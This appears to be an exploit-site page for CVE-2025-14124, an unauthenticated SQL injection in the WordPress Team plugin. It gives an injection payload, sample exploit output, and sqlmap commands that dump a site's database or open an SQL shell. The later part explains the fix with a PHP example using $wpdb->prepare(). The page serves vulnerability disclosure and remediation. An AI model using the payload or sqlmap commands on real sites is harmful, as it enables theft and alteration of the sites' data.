## https://sploitus.com/exploit?id=629BA2F5-D514-569F-92EF-99EF376C4D4C
# CVE-2025-14124
## WordPress Team Plugin - Unauthenticated SQL Injection
**Author:** Hyun Chiya
---
## Vulnerability Information
| Field | Value |
|-------|-------|
| **CVE ID** | CVE-2025-14124 |
| **Plugin** | WordPress Team Plugin |
| **Affected Versions** | versions before the patched release noted under Remediation |
## Vulnerable Code (excerpt)
```php
$term = $wpdb->esc_like( $this->s['s'] ); // ⚠️ esc_like only escapes %, _, \
$where .= "OR ({$wpdb->posts}.post_title LIKE '%{$term}%' ...)"; // ⚠️ SQLi!
}
```
**Problem**: `$wpdb->esc_like()` only escapes LIKE wildcards, NOT SQL injection metacharacters.
## Exploitation Flow
```mermaid
flowchart TD
A["Attacker finds page with [tlpteam] shortcode"] --> B["Extract tlp_nonce and data-sc-id"]
B --> C["POST to /wp-admin/admin-ajax.php"]
C --> D["action=ttp_Layout_Ajax_Action&amp;search=SQL_PAYLOAD"]
D --> E{"Nonce valid?"}
E -->|Yes| F["SQL query executed with payload"]
F --> G["Time-based detection via SLEEP()"]
style F fill:#ff6b6b,stroke:#c92a2a,color:#fff
style G fill:#51cf66,stroke:#2f9e44,color:#fff
```
## Prerequisites
1. Target has WordPress Team Plugin installed

> ⚠️ **Important**: This mode requires **stacked queries** support, which is typically disabled in PHP+MySQL. If stacked queries are not supported, use `--dump` to extract credentials instead, or use `sqlmap --sql-shell` for direct UPDATE execution.
## Example Output
```
>> [ ONLINE ]
┌──────────────────────────────────────────────────────────┐
│ CVE-2025-14124 - WordPress Team Plugin SQL Injection     │
│ Affected: tlp-team                                       │
└──────────────────────────────────────────────────────────┘
>> [ INFORMATION ]
[*] Checking if WordPress Team Plugin is active...
[+] Plugin detected: /wp-content/plugins/tlp-team/readme.txt
[+] Plugin detected!
[*] Searching for page with tlpteam shortcode...
[+] Found team page: http://target.com/our-team/
[+] Target page: http://target.com/our-team/
[+] Extracted nonce: abc123def456
[+] Extracted scID: 42
============================================================
[*] EXPLOIT: Time-Based Blind SQL Injection
============================================================
[*] Payload: t' OR SLEEP(3) OR 't'='t
[*] Expected delay: ~9 seconds (SLEEP executes 3 times)
[*] Sending malicious request...
[*] Response time: 9.23 seconds
[+] SQL INJECTION CONFIRMED!
[+] Response delayed by ~9 seconds (expected: 9)
[!] The target is vulnerable to Time-Based Blind SQL Injection
[!] Database can be extracted using tools like sqlmap
[*] Done.
```
## Using with SQLMap
For advanced exploitation, you can use sqlmap after confirming the vulnerability:
```bash
# Dump database
sqlmap -u "http://target.com/wp-admin/admin-ajax.php" \
--data="action=ttp_Layout_Ajax_Action&scID=32&tlp_nonce=NONCE&search=test" \
-p search --dbms=mysql --technique=T --batch --dump
# SQL Shell (for UPDATE queries)
sqlmap -u "http://target.com/wp-admin/admin-ajax.php" \
--data="action=ttp_Layout_Ajax_Action&scID=32&tlp_nonce=NONCE&search=test" \
-p search --dbms=mysql --technique=T --sql-shell
```
## Remediation
> ⚠️ **IMPORTANT**: Update WordPress Team Plugin to version 5.0.11 or later, where the vulnerability has been patched with proper SQL escaping using `$wpdb->prepare()`.
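The following is an added example, not the plugin's code or the exploit author's, that puts the vulnerable pattern from the "Problem" note (esc_like() alone, value interpolated into the query string) next to the shape the fix uses (`$wpdb->prepare()` with `%s` placeholders). It assumes a tiny stand-in for WordPress's `$wpdb` so it runs outside WordPress; the class name `FakeWpdb` and the two builder functions are hypothetical, and the stand-in `prepare()` only implements `%s` with `addslashes()`, whereas the real method also handles `%d`/`%f` and escapes through the live MySQL connection.

```php
<?php
// Added example (not from the plugin or the PoC). Contrasts the esc_like()-only
// pattern described on this page with the $wpdb->prepare() form of the patch.
// FakeWpdb is a hypothetical stand-in so the file runs offline; inside WordPress
// you would use the global $wpdb and delete this class.

final class FakeWpdb
{
    public string $posts = 'wp_posts';

    // Mirrors wpdb::esc_like(): escapes only the LIKE wildcards %, _ and \.
    // It does NOT touch quotes, so it gives no protection against SQL injection.
    public function esc_like(string $text): string
    {
        return addcslashes($text, '_%\\');
    }

    // Simplified stand-in for wpdb::prepare(): each %s placeholder becomes a
    // single-quoted, escaped literal. Real wpdb::prepare() escapes via the
    // MySQL connection and also supports %d and %f; this is for demonstration.
    public function prepare(string $query, string ...$args): string
    {
        $query = str_replace("'%s'", '%s', $query);   // tolerate pre-quoted %s
        $query = str_replace('%s', "'%s'", $query);   // quote every placeholder
        $escaped = array_map(fn (string $a): string => addslashes($a), $args);
        return vsprintf($query, $escaped);
    }
}

// Vulnerable shape (as in the affected plugin): the search term is wildcard-
// escaped and then concatenated straight into the WHERE clause, so a single
// quote in the term ends the string literal and the rest is parsed as SQL.
function build_where_vulnerable(FakeWpdb $wpdb, string $term): string
{
    $term = $wpdb->esc_like($term);
    return " OR ({$wpdb->posts}.post_title LIKE '%{$term}%'"
         . " OR {$wpdb->posts}.post_content LIKE '%{$term}%')";
}

// Patched shape: esc_like() still neutralises % and _ so user-supplied
// wildcards do not widen the match, but the quoting and escaping are left to
// prepare(). The wildcards travel inside the bound value, not the template.
function build_where_fixed(FakeWpdb $wpdb, string $term): string
{
    $like = '%' . $wpdb->esc_like($term) . '%';
    return $wpdb->prepare(
        " OR ({$wpdb->posts}.post_title LIKE %s OR {$wpdb->posts}.post_content LIKE %s)",
        $like,
        $like
    );
}

$wpdb  = new FakeWpdb();
$input = "t' OR SLEEP(3) OR 't'='t";   // the probe string shown in the sample output above

// In the first line the quote breaks out of the literal and SLEEP() becomes part
// of the query; in the second it is escaped (\') and stays inside the string.
echo "vulnerable:" . build_where_vulnerable($wpdb, $input), PHP_EOL;
echo "fixed:     " . build_where_fixed($wpdb, $input), PHP_EOL;
```

Run it with `php example.php` and compare the two WHERE fragments: the vulnerable builder emits `LIKE '%t' OR SLEEP(3) OR 't'='t%'`, which MySQL parses as three OR'd expressions, while the fixed builder emits one quoted literal with the embedded quotes escaped. The rule this illustrates is the one the WordPress documentation gives for LIKE searches: `esc_like()` for the wildcards, `prepare()` for everything else, never string interpolation.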
## References
- [WPScan Vulnerability Database](https://wpscan.com/vulnerability/fdd19027-b70e-45a4-882b-77ab1819af91/)
## Disclaimer
This tool is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal. Use responsibly.
## Author
**Hyun Chiya**